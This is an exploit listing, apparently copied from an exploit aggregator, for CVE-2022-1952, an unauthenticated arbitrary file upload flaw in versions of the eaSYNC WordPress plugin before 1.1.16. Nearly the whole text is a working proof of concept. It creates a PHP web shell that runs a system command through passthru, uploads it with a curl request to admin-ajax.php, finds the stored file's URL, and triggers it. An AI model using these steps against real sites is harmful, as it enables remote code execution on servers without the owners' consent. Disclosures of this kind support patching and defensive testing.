Exploit for eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload CVE-2022-1952

Name: Exploit for eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload CVE-2022-1952
Rating: 5 (252 reviews)

2022-06-15 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:ECF61D17-8B07-4CB6-93A8-64C2C4FBBE04
1. Create a malicious PHP file:

echo '<?php passthru("id");' > /tmp/evil.php

2. Upload it

curl -H 'Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37' \
    -F 'action=easync_session_store' \
    -F 'type=car' \
    -F 'with_driver=self-driven' \
    -F 'driver_license_image2=@/tmp/evil.php' \
    'http://127.0.0.1/wp-admin/admin-ajax.php'


3. Determine the location where the shell has been uploaded (the "d_license_image" should contain the URL to it):

curl -H 'Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37' \
    'http://127.0.0.1/wp-admin/admin-ajax.php?action=easync_success_and_save'

4. Trigger the payload by accessing the determined URL, e.g: http://127.0.0.1/wp-content/uploads/cff7779bf2268f97c011ece9fd4c9ab0.php